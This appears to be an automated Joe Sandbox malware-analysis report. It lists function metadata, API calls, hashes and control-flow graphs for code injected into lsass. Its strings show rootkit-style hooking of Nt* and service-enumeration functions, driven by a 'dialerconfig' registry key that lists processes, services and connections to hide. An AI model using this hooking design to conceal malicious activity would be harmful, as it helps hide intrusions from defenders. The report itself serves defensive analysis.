                                                              • Opcode ID: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                              • Instruction ID: 7d0801e181e7e1027f0f2556f8cd6da4d5c454e321737ababf7947f23bb56196
                                                              • Opcode Fuzzy Hash: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                              • Instruction Fuzzy Hash: 5651AC32B107A4C6FB61CF29E88C6AD63E5F704784F069123DFA512B86DB35C969C300
                                                              Function 00000202C0AE1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                              • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                              • API String ID: 2135414181-2879589442
                                                              • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                              • Instruction ID: 1d03e476145ce09beb9e97f2b7c5aab0935724522098279c66d9844aa9511552
                                                              • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                              • Instruction Fuzzy Hash: F2710636210B50C6FB109F25E8DCA9D23A9FB84F88F425123DB9E47B6ADE39C458C744
                                                              Function 00000202C0AE1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: FinalHandleNamePathlstrlen
                                                              • String ID: \\?\
                                                              • API String ID: 2719912262-4282027825
                                                              • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                              • Instruction ID: 8c3d5dbfacf504bca622ea7f657326f4a67cd1e3c1ec290e5004b19a988dad2d
                                                              • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                              • Instruction Fuzzy Hash: BCF01922304781D2FB608B21E8CC76D6765F748BC8F958123DB994B966DA2DC68DCB00
                                                              Function 00000202C0AE1000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1617791916-0
                                                              • Opcode ID: 5b325dc3880ca3c93f8f4c7f4460fba72f6c1ea06a067b14687c409243df247f
                                                              • Instruction ID: a5c4e77d733fc4bc935c336303e9112e94b6a16807bf59574ff5562d90f15684
                                                              • Opcode Fuzzy Hash: 5b325dc3880ca3c93f8f4c7f4460fba72f6c1ea06a067b14687c409243df247f
                                                              • Instruction Fuzzy Hash: 8DE0ED76611704C6FB089B62D84C25E76A5FB88B16F458126CB0907322DF3A8499C614
                                                              Function 00000202C0AE328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                              • String ID:
                                                              • API String ID: 1683269324-0
                                                              • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                              • Instruction ID: 435a5f88e7c6a6dd218e0f6004eb37f2790bd4aa4d5b291e1e8191fef771e2ad
                                                              • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                              • Instruction Fuzzy Hash: A8119672618782D2F760D721F8CDB6D2294BB54748F528127ABB6497A3EF78C46C8240
                                                              Function 00000202C0AE1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00000202C0AE1628: GetProcessHeap.KERNEL32 ref: 00000202C0AE1633
                                                                • Part of subcall function 00000202C0AE1628: HeapAlloc.KERNEL32 ref: 00000202C0AE1642
                                                                • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE16B2
                                                                • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE16DF
                                                                • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE16F9
                                                                • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1719
                                                                • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE1734
                                                                • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1754
                                                                • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE176F
                                                                • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE178F
                                                                • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE17AA
                                                                • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE17CA
                                                              • Sleep.KERNEL32 ref: 00000202C0AE1AD7
                                                              • SleepEx.KERNELBASE ref: 00000202C0AE1ADD
                                                                • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE17E5
                                                                • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1805
                                                                • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE1820
                                                                • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1840
                                                                • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE185B
                                                                • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE187B
                                                                • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE1896
                                                                • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE18A0
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen$HeapSleep$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1534210851-0
                                                              • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                              • Instruction ID: 1519724245a59a03f973eddcebe70884a6cccd966baeab2eab41fd8751cf1259
                                                              • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                              • Instruction Fuzzy Hash: ED31C071200BE1C1FF509B26DACD3AD53A5AB84FC4F0654239FA987697FE14C879C210
                                                              Function 00000202C0AB273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 228 202c0ab273c-202c0ab27a4 call 202c0ab29d4 * 4 237 202c0ab27aa-202c0ab27ad 228->237 238 202c0ab29b2 228->238 237->238 240 202c0ab27b3-202c0ab27b6 237->240 239 202c0ab29b4-202c0ab29d0 238->239 240->238 241 202c0ab27bc-202c0ab27bf 240->241 241->238 242 202c0ab27c5-202c0ab27e6 241->242 242->238 244 202c0ab27ec-202c0ab280c 242->244 245 202c0ab280e-202c0ab2836 244->245 246 202c0ab2838-202c0ab283f 244->246 245->245 245->246 247 202c0ab28df-202c0ab28e6 246->247 248 202c0ab2845-202c0ab2852 246->248 250 202c0ab28ec-202c0ab2901 247->250 251 202c0ab2992-202c0ab29b0 247->251 248->247 249 202c0ab2858-202c0ab286a LoadLibraryA 248->249 252 202c0ab286c-202c0ab2878 249->252 253 202c0ab28ca-202c0ab28d2 249->253 250->251 254 202c0ab2907 250->254 251->239 255 202c0ab28c5-202c0ab28c8 252->255 253->249 256 202c0ab28d4-202c0ab28d9 253->256 258 202c0ab290d-202c0ab2921 254->258 255->253 261 202c0ab287a-202c0ab287d 255->261 256->247 259 202c0ab2923-202c0ab2934 258->259 260 202c0ab2982-202c0ab298c 258->260 262 202c0ab293f-202c0ab2943 259->262 263 202c0ab2936-202c0ab293d 259->263 260->251 260->258 264 202c0ab287f-202c0ab28a5 261->264 265 202c0ab28a7-202c0ab28b7 261->265 268 202c0ab294d-202c0ab2951 262->268 269 202c0ab2945-202c0ab294b 262->269 267 202c0ab2970-202c0ab2980 263->267 270 202c0ab28ba-202c0ab28c1 264->270 265->270 267->259 267->260 271 202c0ab2963-202c0ab2967 268->271 272 202c0ab2953-202c0ab2961 268->272 269->267 270->255 271->267 274 202c0ab2969-202c0ab296c 271->274 272->267 274->267
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077444677.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ab0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                              • Instruction ID: e9c472418be9705004432d1361e805bb540b7ad58247b10c253449de9ed0d722
                                                              • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                              • Instruction Fuzzy Hash: 8161DF72B01790C7EB648F15908C76DB3A2FB54BA4F598127DF5D0778ADA38D86AC700
                                                              Function 00000202C0AED6CC Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 275 202c0aed6cc-202c0aed6db 276 202c0aed6dd-202c0aed6e9 275->276 277 202c0aed6eb-202c0aed6fb 275->277 276->277 278 202c0aed72e-202c0aed739 call 202c0aed6ac 276->278 279 202c0aed712-202c0aed72a HeapAlloc 277->279 283 202c0aed73b-202c0aed740 278->283 280 202c0aed6fd-202c0aed704 call 202c0af0720 279->280 281 202c0aed72c 279->281 280->278 287 202c0aed706-202c0aed710 call 202c0aeb85c 280->287 281->283 287->278 287->279
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: AllocHeap
                                                              • String ID:
                                                              • API String ID: 4292702814-0
                                                              • Opcode ID: dd9fd347fe8d251c64e9f03e0b9c8ce045e185238ab486bcf6df9ff2ab176017
                                                              • Instruction ID: f1c622e14429a0b520057bbb946f3f429c66e82a7f768f9b6ab0a37ff79ad3e0
                                                              • Opcode Fuzzy Hash: dd9fd347fe8d251c64e9f03e0b9c8ce045e185238ab486bcf6df9ff2ab176017
                                                              • Instruction Fuzzy Hash: E4F0E998311780C1FE546B6699CD39D22845F88BC0F0E5437CF9A867D3EE1CC4AC8620

                                                              Non-executed Functions

                                                              Function 00000202C0AE2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 490 202c0ae2b2c-202c0ae2ba5 call 202c0b02ce0 493 202c0ae2ee0-202c0ae2f03 490->493 494 202c0ae2bab-202c0ae2bb1 490->494 494->493 495 202c0ae2bb7-202c0ae2bba 494->495 495->493 496 202c0ae2bc0-202c0ae2bc3 495->496 496->493 497 202c0ae2bc9-202c0ae2bd9 GetModuleHandleA 496->497 498 202c0ae2bed 497->498 499 202c0ae2bdb-202c0ae2beb GetProcAddress 497->499 500 202c0ae2bf0-202c0ae2c0e 498->500 499->500 500->493 502 202c0ae2c14-202c0ae2c33 StrCmpNIW 500->502 502->493 503 202c0ae2c39-202c0ae2c3d 502->503 503->493 504 202c0ae2c43-202c0ae2c4d 503->504 504->493 505 202c0ae2c53-202c0ae2c5a 504->505 505->493 506 202c0ae2c60-202c0ae2c73 505->506 507 202c0ae2c75-202c0ae2c81 506->507 508 202c0ae2c83 506->508 509 202c0ae2c86-202c0ae2c8a 507->509 508->509 510 202c0ae2c8c-202c0ae2c98 509->510 511 202c0ae2c9a 509->511 512 202c0ae2c9d-202c0ae2ca7 510->512 511->512 513 202c0ae2d9d-202c0ae2da1 512->513 514 202c0ae2cad-202c0ae2cb0 512->514 517 202c0ae2da7-202c0ae2daa 513->517 518 202c0ae2ed2-202c0ae2eda 513->518 515 202c0ae2cc2-202c0ae2ccc 514->515 516 202c0ae2cb2-202c0ae2cbf call 202c0ae199c 514->516 520 202c0ae2d00-202c0ae2d0a 515->520 521 202c0ae2cce-202c0ae2cdb 515->521 516->515 522 202c0ae2dac-202c0ae2db8 call 202c0ae199c 517->522 523 202c0ae2dbb-202c0ae2dc5 517->523 518->493 518->506 528 202c0ae2d0c-202c0ae2d19 520->528 529 202c0ae2d3a-202c0ae2d3d 520->529 521->520 527 202c0ae2cdd-202c0ae2cea 521->527 522->523 524 202c0ae2dc7-202c0ae2dd4 523->524 525 202c0ae2df5-202c0ae2df8 523->525 524->525 534 202c0ae2dd6-202c0ae2de3 524->534 535 202c0ae2dfa-202c0ae2e03 call 202c0ae1bbc 525->535 536 202c0ae2e05-202c0ae2e12 lstrlenW 525->536 537 202c0ae2ced-202c0ae2cf3 527->537 528->529 538 202c0ae2d1b-202c0ae2d28 528->538 531 202c0ae2d3f-202c0ae2d49 call 202c0ae1bbc 529->531 532 202c0ae2d4b-202c0ae2d58 lstrlenW 529->532 531->532 545 202c0ae2d93-202c0ae2d98 531->545 540 202c0ae2d5a-202c0ae2d64 532->540 541 202c0ae2d7b-202c0ae2d8d call 202c0ae3844 532->541 542 202c0ae2de6-202c0ae2dec 534->542 535->536 553 202c0ae2e4a-202c0ae2e55 535->553 546 202c0ae2e14-202c0ae2e1e 536->546 547 202c0ae2e35-202c0ae2e3f call 202c0ae3844 536->547 544 202c0ae2cf9-202c0ae2cfe 537->544 537->545 548 202c0ae2d2b-202c0ae2d31 538->548 540->541 551 202c0ae2d66-202c0ae2d79 call 202c0ae152c 540->551 541->545 556 202c0ae2e42-202c0ae2e44 541->556 552 202c0ae2dee-202c0ae2df3 542->552 542->553 544->520 544->537 545->556 546->547 557 202c0ae2e20-202c0ae2e33 call 202c0ae152c 546->557 547->556 548->545 558 202c0ae2d33-202c0ae2d38 548->558 551->541 551->545 552->525 552->542 560 202c0ae2ecc-202c0ae2ed0 553->560 561 202c0ae2e57-202c0ae2e5b 553->561 556->518 556->553 557->547 557->553 558->529 558->548 560->518 565 202c0ae2e5d-202c0ae2e61 561->565 566 202c0ae2e63-202c0ae2e7d call 202c0ae85c0 561->566 565->566 569 202c0ae2e80-202c0ae2e83 565->569 566->569 572 202c0ae2ea6-202c0ae2ea9 569->572 573 202c0ae2e85-202c0ae2ea3 call 202c0ae85c0 569->573 572->560 575 202c0ae2eab-202c0ae2ec9 call 202c0ae85c0 572->575 573->572 575->560
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                              • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                              • API String ID: 2119608203-3850299575
                                                              • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                              • Instruction ID: 629c2a77cc7c689ebc2a82fae016c29b45818ce3604cad8590d8ad8b42d26791
                                                              • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                              • Instruction Fuzzy Hash: 8BB18B62210BA0C6FB688F25C8CC7AD67A5F744B88F565017EF9953796EB35CC68C340
                                                              Function 00000202C0AE7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3140674995-0
                                                              • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                              • Instruction ID: 43f65ee015122b04127526cc5c334c21e5a52d8fe7862f76cef395083f707644
                                                              • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                              • Instruction Fuzzy Hash: 74311972205B80CAFB609F60E8887ED6364F784744F45442BDB8E57A9AEF39C658C710
                                                              Function 00000202C0AED2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 1239891234-0
                                                              • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                              • Instruction ID: 3629953f5db9c1b5f8070e01c3cc1c8c2a667b2e639c3edd282c0df2f16cc2f9
                                                              • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                              • Instruction Fuzzy Hash: FF314F36214B80C6EB60CF25E88879E73A4F789758F550127EB9D47BA6EF38C559CB00
                                                              Function 00000202C0AE12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                              • String ID: d
                                                              • API String ID: 2005889112-2564639436
                                                              • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                              • Instruction ID: a5c0dd0dd48098ab404cbb16107d584fe92d72ef17c22032ec6d5acc94b81fb7
                                                              • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                              • Instruction Fuzzy Hash: 2C513876200B84C6EB50CF62E48C35EB7A5F788F89F458126DB890776ADF39C059CB00
                                                              Function 00000202C0AE1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread$AddressHandleModuleProc
                                                              • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                              • API String ID: 4175298099-1975688563
                                                              • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                              • Instruction ID: 90a0736ddaf8fe37476ff4478ca91d660d6ffa8bbfea73cfc67e31501e438409
                                                              • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                              • Instruction Fuzzy Hash: 5031A2A5100B8AE0FE15EF69E8DD7DC2321F704748F835423D7A9021679F79866ED391
                                                              Function 00000202C0AB6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 332 202c0ab6910-202c0ab6916 333 202c0ab6951-202c0ab695b 332->333 334 202c0ab6918-202c0ab691b 332->334 335 202c0ab6a78-202c0ab6a8d 333->335 336 202c0ab691d-202c0ab6920 334->336 337 202c0ab6945-202c0ab6984 call 202c0ab6fc0 334->337 340 202c0ab6a9c-202c0ab6ab6 call 202c0ab6e54 335->340 341 202c0ab6a8f 335->341 338 202c0ab6922-202c0ab6925 336->338 339 202c0ab6938 __scrt_dllmain_crt_thread_attach 336->339 355 202c0ab698a-202c0ab699f call 202c0ab6e54 337->355 356 202c0ab6a52 337->356 343 202c0ab6931-202c0ab6936 call 202c0ab6f04 338->343 344 202c0ab6927-202c0ab6930 338->344 347 202c0ab693d-202c0ab6944 339->347 353 202c0ab6aef-202c0ab6b20 call 202c0ab7190 340->353 354 202c0ab6ab8-202c0ab6aed call 202c0ab6f7c call 202c0ab6e1c call 202c0ab7318 call 202c0ab7130 call 202c0ab7154 call 202c0ab6fac 340->354 345 202c0ab6a91-202c0ab6a9b 341->345 343->347 364 202c0ab6b31-202c0ab6b37 353->364 365 202c0ab6b22-202c0ab6b28 353->365 354->345 367 202c0ab6a6a-202c0ab6a77 call 202c0ab7190 355->367 368 202c0ab69a5-202c0ab69b6 call 202c0ab6ec4 355->368 359 202c0ab6a54-202c0ab6a69 356->359 371 202c0ab6b7e-202c0ab6b94 call 202c0ab268c 364->371 372 202c0ab6b39-202c0ab6b43 364->372 365->364 370 202c0ab6b2a-202c0ab6b2c 365->370 367->335 382 202c0ab69b8-202c0ab69dc call 202c0ab72dc call 202c0ab6e0c call 202c0ab6e38 call 202c0abac0c 368->382 383 202c0ab6a07-202c0ab6a11 call 202c0ab7130 368->383 377 202c0ab6c1f-202c0ab6c2c 370->377 390 202c0ab6bcc-202c0ab6bce 371->390 391 202c0ab6b96-202c0ab6b98 371->391 378 202c0ab6b4f-202c0ab6b5d call 202c0ac5780 372->378 379 202c0ab6b45-202c0ab6b4d 372->379 385 202c0ab6b63-202c0ab6b78 call 202c0ab6910 378->385 401 202c0ab6c15-202c0ab6c1d 378->401 379->385 382->383 435 202c0ab69de-202c0ab69e5 __scrt_dllmain_after_initialize_c 382->435 383->356 403 202c0ab6a13-202c0ab6a1f call 202c0ab7180 383->403 385->371 385->401 399 202c0ab6bd0-202c0ab6bd3 390->399 400 202c0ab6bd5-202c0ab6bea call 202c0ab6910 390->400 391->390 398 202c0ab6b9a-202c0ab6bbc call 202c0ab268c call 202c0ab6a78 391->398 398->390 429 202c0ab6bbe-202c0ab6bc6 call 202c0ac5780 398->429 399->400 399->401 400->401 414 202c0ab6bec-202c0ab6bf6 400->414 401->377 422 202c0ab6a21-202c0ab6a2b call 202c0ab7098 403->422 423 202c0ab6a45-202c0ab6a50 403->423 419 202c0ab6c01-202c0ab6c11 call 202c0ac5780 414->419 420 202c0ab6bf8-202c0ab6bff 414->420 419->401 420->401 422->423 434 202c0ab6a2d-202c0ab6a3b 422->434 423->359 429->390 434->423 435->383 436 202c0ab69e7-202c0ab6a04 call 202c0ababc8 435->436 436->383
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077444677.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ab0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                              • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                              • API String ID: 190073905-1786718095
                                                              • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction ID: 14de66892ba18830acab2e245ab1e6cb8a15d62160b2822f01b591de40b948de
                                                              • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction Fuzzy Hash: 1381EE31600701CAFB50AB66A4CD39D66E8EB85780F57842BAB48977B7DF3DC88D8700
                                                              Function 00000202C0AECE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetLastError.KERNEL32 ref: 00000202C0AECE37
                                                              • FlsGetValue.KERNEL32(?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECE4C
                                                              • FlsSetValue.KERNEL32(?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECE6D
                                                              • FlsSetValue.KERNEL32(?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECE9A
                                                              • FlsSetValue.KERNEL32(?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECEAB
                                                              • FlsSetValue.KERNEL32(?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECEBC
                                                              • SetLastError.KERNEL32 ref: 00000202C0AECED7
                                                              • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECF0D
                                                              • FlsSetValue.KERNEL32(?,?,00000001,00000202C0AEECCC,?,?,?,?,00000202C0AEBF9F,?,?,?,?,?,00000202C0AE7AB0), ref: 00000202C0AECF2C
                                                                • Part of subcall function 00000202C0AED6CC: HeapAlloc.KERNEL32 ref: 00000202C0AED721
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECF54
                                                                • Part of subcall function 00000202C0AED744: HeapFree.KERNEL32 ref: 00000202C0AED75A
                                                                • Part of subcall function 00000202C0AED744: GetLastError.KERNEL32 ref: 00000202C0AED764
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECF65
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECF76
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
